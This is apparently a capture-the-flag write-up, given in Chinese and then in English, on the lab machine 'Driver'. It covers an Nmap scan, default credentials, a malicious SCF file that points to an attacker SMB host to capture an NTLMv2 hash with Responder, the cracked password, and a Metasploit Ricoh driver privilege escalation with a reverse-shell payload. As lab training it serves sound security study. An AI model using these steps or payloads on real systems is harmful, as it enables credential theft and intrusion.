本文介绍了如何通过对Windows系统进行信息收集、漏洞分析和利用,实现用户权限提升和根权限获取。使用Nmap扫描目标主机,发现开放的端口和服务,并通过上传恶意的SCF文件捕获NTLM哈希。接着,利用破解得到的哈希获取用户权限,并进行特权提升,最终利用Ricoh打印机驱动程序的漏洞获取根权限。文章详细描述了攻击流程和方法,为读者提供了实用的渗透测试技术和经验教训。 This article details how to achieve user privilege escalation and root access by conducting information gathering, vulnerability analysis, and exploitation on a Windows system. It describes using Nmap to scan the target host, identify open ports and services, and capture NTLM hashes by uploading a malicious SCF file. Subsequently, the cracked hashes are used to obtain user privileges, followed by privilege escalation. Finally, root privileges are gained by exploiting a vulnerability in a Ricoh printer driver. The article thoroughly outlines the attack流程 and methods, providing readers with practical penetration testing techniques and lessons learned.

Information Gathering

# Nmap 7.98 scan initiated Wed Dec 31 09:16:57 2025 as: /usr/lib/nmap/nmap -sC -sV -v -O -oN nmap_result.txt 10.10.11.106
Nmap scan report for 10.10.11.106
Host is up (0.088s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT     STATE SERVICE      VERSION
80/tcp   open  http         Microsoft IIS httpd 10.0
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=MFP Firmware Update Center. Please enter password for admin
135/tcp  open  msrpc        Microsoft Windows RPC
445/tcp  open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows 10 1607 (89%), Microsoft Windows Server 2008 R2 (89%), Microsoft Windows 11 (86%), Microsoft Windows 8.1 Update 1 (86%), Microsoft Windows Phone 7.5 or 8.0 (86%), Microsoft Windows Vista or Windows 7 (86%), Microsoft Windows Server 2008 R2 or Windows 7 SP1 (85%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2016 (85%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 0.001 days (since Wed Dec 31 09:15:55 2025)
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2025-12-31T15:47:04
|_  start_date: 2025-12-31T15:45:49
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 6h29m44s, deviation: 0s, median: 6h29m44s

Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Dec 31 09:17:57 2025 -- 1 IP address (1 host up) scanned in 60.06 seconds

Vulnerability Analysis

打开http://10.10.11.106/输入admin:admin就进入了,发现可以上传固件。加上smb服务开启

SCF NTLM 哈希捕获

Windows 系统有一个特性:如果一个文件夹里包含一个 .scf (Shell Command File) 文件,并且 Windows 资源管理器(或某种后台服务)尝试查看这个文件夹时,.scf 文件可以指示系统去加载一个“远程图标”。

攻击流程

  1. 上传一个恶意的 .scf 文件,里面写着“图标请去攻击者的机器上取”。
  2. 靶机后台服务在处理上传目录时,会尝试连接Kali。
  3. Windows 在连接 SMB 共享时,会默认发送当前用户的 NTLMv2 哈希 进行身份验证。
  4. 在 Kali 上用 Responder 监听,就能截获这个哈希。
  5. 拿到哈希后,破解它,获得明文密码。

Exploitation (User Flag)

上传一个恶意的.csf程序,里面包含“图标请去攻击者的机器上取”。

➜  Driver nano @exploit.scf
➜  Driver cat @exploit.scf
[Shell]
Command=2
IconFile=\\10.10.16.3\share\test.ico
[Taskbar]
Command=ToggleDesktop

启动监听上传文件

➜  Driver sudo responder -I tun0
[SMB] NTLMv2-SSP Hash     : tony::DRIVER:9df54339562d9c7c:9D14D9809E6DB7E0A35B2866A418F660:0101000000000000002E498F377ADC01C085F55086ACD0BF0000000002000800440044004200320001001E00570049004E002D004C004C00320054004C00480056004C004C005800370004003400570049004E002D004C004C00320054004C00480056004C004C00580037002E0044004400420032002E004C004F00430041004C000300140044004400420032002E004C004F00430041004C000500140044004400420032002E004C004F00430041004C0007000800002E498F377ADC010600040002000000080030003000000000000000000000000020000021B774E55D153D08289FB802C0AFD1AB67A81BF61B6A4381AE931D3BBB07E3BE0A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310036002E003300000000000000000000000000

破解密码得到tony:liltony

➜  Driver evil-winrm -i 10.10.11.106 -u tony -p 'liltony'

Privilege Escalation (Root Flag)

我们尝试连接到msfconsole

meterpreter > ps
2848  840   taskhostw.exe            x64   1        DRIVER\tony  C:\Windows\System32\taskhostw.exe
meterpreter > migrate 2848  # migrate 到1的可以交互的地方
[*] Migrating from 5036 to 2848...
[*] Migration completed successfully.
msf exploit(multi/handler) > use multi/recon/local_exploit_suggester
msf post(multi/recon/local_exploit_suggester) > set session 1
run
[*] 10.10.11.106 - Valid modules for session 1:
============================

 #   Name                                                           Potentially Vulnerable?  Check Result
 -   ----                                                           -----------------------  ------------
 1   exploit/windows/local/bypassuac_comhijack                      Yes                      The target appears to be vulnerable.
 2   exploit/windows/local/bypassuac_dotnet_profiler                Yes                      The target appears to be vulnerable.
 3   exploit/windows/local/bypassuac_eventvwr                       Yes                      The target appears to be vulnerable.
 4   exploit/windows/local/bypassuac_fodhelper                      Yes                      The target appears to be vulnerable.
......

鉴于80端口运行的是打印机服务,所以我们可以尝试相关的漏洞

我们查看一下powershell的历史命令

C:\Users\tony\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

PS C:\Users\tony> type C:\Users\tony\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
Add-Printer -PrinterName "RICOH_PCL6" -DriverName 'RICOH PCL6 UniversalDriver V4.23' -PortName 'lpt1:'

ping 1.1.1.1
ping 1.1.1.1

所以使用

15  exploit/windows/local/ricoh_driver_privesc    Yes   The target appears to be vulnerable. Ricoh driver directory has full permissions
msf exploit(windows/local/ricoh_driver_privesc) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(windows/local/ricoh_driver_privesc) > set session 1
session => 1
msf exploit(windows/local/ricoh_driver_privesc) > set lhost tun0
lhost => 10.10.16.3
msf exploit(windows/local/ricoh_driver_privesc) > run

Lessons Learned

Information Gathering

# Nmap 7.98 scan initiated Wed Dec 31 09:16:57 2025 as: /usr/lib/nmap/nmap -sC -sV -v -O -oN nmap_result.txt 10.10.11.106
Nmap scan report for 10.10.11.106
Host is up (0.088s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT     STATE SERVICE      VERSION
80/tcp   open  http         Microsoft IIS httpd 10.0
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=MFP Firmware Update Center. Please enter password for admin
135/tcp  open  msrpc        Microsoft Windows RPC
445/tcp  open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows 10 1607 (89%), Microsoft Windows Server 2008 R2 (89%), Microsoft Windows 11 (86%), Microsoft Windows 8.1 Update 1 (86%), Microsoft Windows Phone 7.5 or 8.0 (86%), Microsoft Windows Vista or Windows 7 (86%), Microsoft Windows Server 2008 R2 or Windows 7 SP1 (85%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2016 (85%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 0.001 days (since Wed Dec 31 09:15:55 2025)
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2025-12-31T15:47:04
|_  start_date: 2025-12-31T15:45:49
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 6h29m44s, deviation: 0s, median: 6h29m44s

Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Dec 31 09:17:57 2025 -- 1 IP address (1 host up) scanned in 60.06 seconds

Vulnerability Analysis

Opening http://10.10.11.106/ and logging in with admin:admin reveals that firmware can be uploaded. Additionally, the SMB service is enabled.

SCF NTLM Hash Capture

Windows has a feature: if a folder contains a .scf (Shell Command File) and Windows Explorer (or a background service) attempts to view the folder, the .scf file can instruct the system to load a "remote icon".

Attack Flow:

  1. Upload a malicious .scf file that instructs the system to "fetch the icon from the attacker's machine".
  2. When the target's background service processes the uploaded directory, it attempts to connect to Kali.
  3. When Windows connects to an SMB share, it automatically sends the current user's NTLMv2 hash for authentication.
  4. Using Responder on Kali to listen captures this hash.
  5. After obtaining the hash, crack it to retrieve the plaintext password.

Exploitation (User Flag)

Upload a malicious .scf file that instructs the system to "fetch the icon from the attacker's machine".

➜  Driver nano @exploit.scf
➜  Driver cat @exploit.scf
[Shell]
Command=2
IconFile=\\10.10.16.3\share\test.ico
[Taskbar]
Command=ToggleDesktop

Start listening for uploaded files

➜  Driver sudo responder -I tun0
[SMB] NTLMv2-SSP Hash     : tony::DRIVER:9df54339562d9c7c:9D14D9809E6DB7E0A35B2866A418F660:0101000000000000002E498F377ADC01C085F55086ACD0BF0000000002000800440044004200320001001E00570049004E002D004C004C00320054004C00480056004C004C005800370004003400570049004E002D004C004C00320054004C00480056004C004C00580037002E0044004400420032002E004C004F00430041004C000300140044004400420032002E004C004F00430041004C000500140044004400420032002E004C004F00430041004C0007000800002E498F377ADC010600040002000000080030003000000000000000000000000020000021B774E55D153D08289FB802C0AFD1AB67A81BF61B6A4381AE931D3BBB07E3BE0A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310036002E003300000000000000000000000000

Cracking the password yields tony:liltony

➜  Driver evil-winrm -i 10.10.11.106 -u tony -p 'liltony'

Privilege Escalation (Root Flag)

We attempt to connect via msfconsole

meterpreter > ps
2848  840   taskhostw.exe            x64   1        DRIVER\tony  C:\Windows\System32\taskhostw.exe
meterpreter > migrate 2848  # migrate to a process that can interact with the desktop
[*] Migrating from 5036 to 2848...
[*] Migration completed successfully.
msf exploit(multi/handler) > use multi/recon/local_exploit_suggester
msf post(multi/recon/local_exploit_suggester) > set session 1
run
[*] 10.10.11.106 - Valid modules for session 1:
============================

 #   Name                                                           Potentially Vulnerable?  Check Result
 -   ----                                                           -----------------------  ------------
 1   exploit/windows/local/bypassuac_comhijack                      Yes                      The target appears to be vulnerable.
 2   exploit/windows/local/bypassuac_dotnet_profiler                Yes                      The target appears to be vulnerable.
 3   exploit/windows/local/bypassuac_eventvwr                       Yes                      The target appears to be vulnerable.
 4   exploit/windows/local/bypassuac_fodhelper                      Yes                      The target appears to be vulnerable.
......

Since port 80 runs a printer service, we can attempt related vulnerabilities.

Let's check the PowerShell history commands

C:\Users\tony\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

PS C:\Users\tony> type C:\Users\tony\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
Add-Printer -PrinterName "RICOH_PCL6" -DriverName 'RICOH PCL6 UniversalDriver V4.23' -PortName 'lpt1:'

ping 1.1.1.1
ping 1.1.1.1

Therefore, use

15  exploit/windows/local/ricoh_driver_privesc    Yes   The target appears to be vulnerable. Ricoh driver directory has full permissions
msf exploit(windows/local/ricoh_driver_privesc) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(windows/local/ricoh_driver_privesc) > set session 1
session => 1
msf exploit(windows/local/ricoh_driver_privesc) > set lhost tun0
lhost => 10.10.16.3
msf exploit(windows/local/ricoh_driver_privesc) > run

Lessons Learned